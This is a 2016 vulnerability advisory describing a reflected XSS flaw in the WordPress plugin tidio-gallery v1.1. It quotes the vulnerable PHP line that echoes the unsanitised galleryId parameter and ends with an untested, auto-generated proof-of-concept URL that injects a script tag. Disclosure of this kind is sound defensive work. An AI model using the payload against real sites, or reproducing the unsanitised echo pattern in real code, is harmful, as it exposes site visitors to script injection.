Advisory #: 427
Title: Reflected XSS in wordpress plugin tidio-gallery v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/tidio-gallery
Downloads: 4763
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: tidio-gallery
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./tidio-gallery/popup-insert-help.php: 55: <p>If you want to add the gallery in different place than subpage/post you need to paste the following shortcode into your subpage <pre>&lt;?php echo do_shortcode('[tidio-gallery id="<?php echo $_GET['galleryId'] ?>" /]'); ?&gt;</pre>.</p> The variable galleryId appears to send unsanitized data back to the users browser.
CVE-ID: 2016-1000153
File:./tidio-gallery/popup-insert-help.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"